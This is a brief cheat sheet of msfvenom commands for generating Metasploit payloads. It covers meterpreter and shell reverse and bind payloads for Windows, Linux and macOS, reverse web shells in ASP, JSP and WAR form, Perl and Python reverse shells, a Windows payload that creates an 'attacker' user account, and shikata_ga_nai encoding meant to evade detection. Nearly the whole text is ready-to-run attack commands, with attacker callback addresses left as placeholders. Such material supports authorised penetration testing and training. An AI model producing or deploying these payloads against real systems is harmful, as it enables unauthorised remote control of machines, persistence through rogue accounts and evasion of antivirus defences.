A quick custom cheatsheet for creating payloads using msfvenom. Major chunk of work happens around these payloads.For more info refer: (Note: RHOST is not mandatory in any of the bind shells)
Listing payloads
msfvenom -l
Windows Paylaods
Reverse Shell :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
Bind Shell:
msfvenom -p windows/meterpreter/bind_tcp RHOST= (IP Address) LPORT=(Your Port) -f exe > bind.exe
Create User:
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
CMD shell:
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
Encoder:
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
One can also use the -a to specify the architecture or the --platform
Linux Payloads
Reverse Shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf
Bind Shell:
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
Generic Shell:
msfvenom -p generic/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > term.elf
MAC Paylaods
Reverse Shell:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
Bind Shell:
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
Web Based Payloads
ASP
Reverse shell :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
JSP
Reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
WAR
Reverse Shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
Script Langauge payloads
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
Python
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py